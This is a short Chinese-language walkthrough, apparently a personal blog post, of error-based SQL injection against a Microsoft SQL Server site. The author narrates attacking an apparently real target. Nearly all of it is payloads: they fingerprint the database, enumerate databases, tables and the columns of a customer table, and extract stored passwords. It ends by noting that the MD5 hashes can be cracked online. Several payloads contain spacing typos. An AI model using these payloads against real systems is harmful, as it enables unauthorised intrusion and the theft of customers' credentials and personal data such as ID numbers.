注入點屏蔽了and語句and 1=2 沒有報錯,就用or語句。
and (select count(*) from sysobjects)>0 返回正常就是mssql數據庫
and 1=(select @@version) 查看版本信息
and 1=(select db_name())獲取當前所在數據庫名(對其他數據庫沒有權限)
and 1=(select top 1 name from master..sysdatabases where dbid>4)
獲取第一個數據庫名
and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一個數據庫庫名') 獲取第二個數據庫庫名
可以繼續爆數據庫:and 1=(select top 1 name from master..sysdatabaseswhere dbid>4 and name <> '第一個庫名' and name <> '第二個庫名')
以此類推我爆出了6個數據庫
and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一個庫名' and name <> '第二個庫名' and name <> '第三個庫名' and name <> '第四個庫名' and name <> '第五個庫名' and name <> '第六個庫名')
獲取第一個當前使用的數據庫表名:and 1=(select top 1 name from sysobjects wherextype='u')
獲取第二個當前使用的數據庫表名:and 1=(select top 1 name from sysobjects where xtype='u’ and name <> '第一個數據庫表名')
以此類推一直把所有表名全部爆出(超痛苦~)
and 1=(select top 1 name from sysobjects wherextype='u' and name <> '表1' and name <> '表2' and name <> '表3' and name <> '表4' and name <> '表5' and name <> '.......................... and name <> '表42')
獲取第一個當前使用的數據庫中的表(CusTomer)中的字段:and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'CusTomer'))
同理,一直爆該表的字段,爆完爲止:and 1=(select top 1 name from syscolumns where id= (select id fromsysobjects where name = 'CusTomer')and name <> 'Account' and name<> 'Account_UseMode' and name <> 'Address' and name <>'AvailDate' and name <> 'Bind_IP' and name <> 'ContactType' andname <> 'CreateDate' and name <> 'CusTomer_ID' and name <>'CusTomer_UUID' and name <> 'Discount' and name <> 'Distinction'and name <> 'IDCardNo' and name <> 'LastCheckDate' and name<> 'LastProgID' and name <> 'LastTime' and name <> 'ModiMail'and name <> 'ModiPass' and name <> 'PayMode' and name <>'PBAnswer' and name <> 'PBQuestion' and name <> 'Purchase_Mode' andname <> 'RealName' and name <> 'Status' and name <> 'UserAge' and name <>'UserDuty' and name <> 'UserMail' and name <> 'UserMemo' and name<> 'UserName' and name <> 'UserPass' and name <>'UserTechPost')
獲取第一個當前使用的數據庫中的表(UserPass)中的列(CusTomer)的字段:and 1=(select top1 UserPass from CusTomer)
UserName 需要一些技巧,需要編碼:
賬號密碼都有了,密碼是MD5加密,網上有很多都解密的!
晨風